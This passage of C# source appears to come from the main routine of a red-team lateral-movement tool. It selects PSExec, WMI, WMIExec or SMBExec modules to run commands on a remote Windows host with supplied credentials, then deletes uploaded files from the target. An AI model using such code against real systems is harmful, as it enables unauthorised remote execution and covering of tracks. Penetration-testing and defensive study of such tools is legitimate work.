                    Console.WriteLine("[+] Sometimes, depending on what was executed your process/file may still be open");
                    Console.WriteLine("[+] Make sure process is not still running then press ENTER to remove file");
                    Console.ReadLine();
                    FileAddRemove deleteFile = new FileAddRemove();
                    deleteFile.delete(executionPath, rhost, username, password, domain);
                }
            }
            catch
            {
                // Catch-all: a failure in PSExec or in the cleanup delete is reported only as this message.
                Console.WriteLine("[-] Something went wrong with PSEXEC module. Please check syntax and run again.");
            }
        }
        //WMI
        else if (module.ToLower() == "wmi")
        {
            try
            {
                ManageProcess create = new ManageProcess();
                create.wmi(rhost, executionPath, cmdArgs, domain, username, password);
                //If file was uploaded remove it
                if (uploadPath != "" && executionPath != "")
                {
                    Console.WriteLine("[+] Sometimes, depending on what was executed your process/file may still be open");
                    Console.WriteLine("[+] Make sure process is not still running then press ENTER to remove file");
                    Console.ReadLine();
                    //Sleep allows time for execution
                    System.Threading.Thread.Sleep(2000);
                    FileAddRemove deleteFile = new FileAddRemove();
                    deleteFile.delete(executionPath, rhost, username, password, domain);
                }
            }
            catch
            {
                // Catch-all: exception discarded.
                Console.WriteLine("[-] Something went wrong with WMI module. Please check syntax and run again.");
            }
        }
        //WMIExec
        // Interactive shell; no post-run file cleanup in this branch.
        else if (module.ToLower() == "wmiexec")
        {
            try
            {
                ManageProcess create = new ManageProcess();
                create.wmiexec(rhost, executionPath, cmdArgs, domain, username, password);
            }
            catch
            {
                // Catch-all: exception discarded.
                Console.WriteLine("[-] Something went wrong with WMIExec module. Please check syntax and run again.");
            }
        }
        //SMBEXEC
        // Interactive shell; no post-run file cleanup in this branch.
        else if (module.ToLower() == "smbexec")
        {
            try
            {
                ManageService create = new ManageService();
                create.smbExec(rhost, serviceName, serviceDisplayName, cmdArgs, domain, username, password);
            }
            catch
            {
                // Catch-all: exception discarded.
                Console.WriteLine("[-] Something went wrong with SMBExec module. Please check syntax and run again.");
            }
        }
        else
        {
            // Unknown -m value.
            Console.WriteLine("[-] Something went wrong. Please check syntax and run again.");
        }
    }
} //End Main